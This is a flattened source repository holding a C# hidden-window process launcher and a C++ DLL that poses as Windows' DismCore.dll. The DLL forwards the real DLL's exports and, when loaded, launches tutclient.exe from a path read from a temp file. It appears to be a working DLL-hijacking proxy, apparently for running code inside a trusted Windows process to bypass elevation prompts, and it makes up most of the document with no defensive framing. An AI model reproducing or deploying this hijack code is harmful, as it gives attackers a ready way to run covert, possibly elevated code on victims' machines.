testAnything 9 | { 10 | class Program 11 | { 12 | static void Main(string[] args) 13 | { 14 | ProcessStartInfo startInfo = new ProcessStartInfo(); 15 | startInfo.FileName = args[0]; 16 | startInfo.Arguments = args[1]; 17 | startInfo.WindowStyle = ProcessWindowStyle.Hidden; 18 | Process proc = new Process(); 19 | proc.StartInfo = startInfo; 20 | proc.Start(); 21 | proc.WaitForExit(); 22 | } 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /testAnything/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("testAnything")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("testAnything")] 13 | [assembly: AssemblyCopyright("Copyright © 2017")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("56bae5a3-b462-439f-adf6-f98676a679c5")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /testDll/Main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | BOOL APIENTRY DllMain(HANDLE hModule, DWORD dwReason, VOID* reserved) 7 | { 8 | OutputDebugString(TEXT("Testing output Debug string")); 9 | 10 | std::ifstream infile; 11 | char tempBuf[MAX_PATH]; 12 | GetTempPathA(MAX_PATH, tempBuf); 13 | std::string tempFolder = tempBuf; 14 | tempFolder += "\\clientlocationx12.txt"; 15 | infile.open(tempFolder.c_str()); 16 | std::string startDirectory; 17 | std::string exePath; 18 | 19 | if (infile.is_open()) 20 | { 21 | while (!infile.eof()) 22 | { 23 | std::getline(infile, startDirectory); 24 | break; 25 | } 26 | } 27 | 28 | infile.close(); 29 | 30 | exePath += startDirectory + "\\tutclient.exe"; 31 | 32 | switch (dwReason) 33 | { 34 | case DLL_PROCESS_ATTACH: 35 | 36 | STARTUPINFOA lpStartupInfo; 37 | PROCESS_INFORMATION lpProcessInfo; 38 | memset(&lpStartupInfo, 0, sizeof(lpStartupInfo)); 39 | memset(&lpProcessInfo, 0, sizeof(lpProcessInfo)); 40 | 41 | /* Create the process */ 42 | if (!CreateProcessA(exePath.c_str(), NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, startDirectory.c_str(), &lpStartupInfo, &lpProcessInfo)) 43 | { 44 | std::cout << "Not Worknig" << GetLastError() << std::endl; 45 | } 46 | break; 47 | } 48 | 49 | return TRUE; 50 | } -------------------------------------------------------------------------------- /testDll/dismCore.cpp: -------------------------------------------------------------------------------- 1 | //The exports 2 | 3 | //DllCanUnloadNow 4 | //DllGetClassObject 5 | //DllRegisterServer 6 | //DllUnregisterServer 7 | 8 | #pragma comment(linker, "/export:DllCanUnloadNow=C:/Windows/System32/Dism/DismCore.DllCanUnloadNow") 9 | #pragma comment(linker, "/export:DllGetClassObject=C:/Windows/System32/Dism/DismCore.DllGetClassObject") 10 | #pragma comment(linker, "/export:DllRegisterServer=C:/Windows/System32/Dism/DismCore.DllRegisterServer") 11 | #pragma comment(linker, "/export:DllUnregisterServer=C:/Windows/System32/Dism/DismCore.DllUnregisterServer") -------------------------------------------------------------------------------- /testDll/testDll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {62DFCCF4-6642-4A86-861F-04E25A7CEFC5} 24 | Win32Proj 25 | testDll 26 | 10.0.14393.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v141 46 | Unicode 47 | Static 48 | 49 | 50 | DynamicLibrary 51 | false 52 | v141 53 | true 54 | Unicode 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | true 76 | 77 | 78 | true 79 | 80 | 81 | false 82 | 83 | 84 | false 85 | 86 | 87 | 88 | 89 | 90 | Level3 91 | Disabled 92 | WIN32;_DEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions) 93 | 94 | 95 | Windows 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions) 105 | 106 | 107 | Windows 108 | 109 | 110 | 111 | 112 | 113 | 114 | Level3 115 | 116 | 117 | MaxSpeed 118 | true 119 | true 120 | WIN32;NDEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions) 121 | 122 | 123 | Windows 124 | true 125 | true 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions) 137 | 138 | 139 | Windows 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /testDll/testDll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | -------------------------------------------------------------------------------- /unattend.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | --------------------------------------------------------------------------------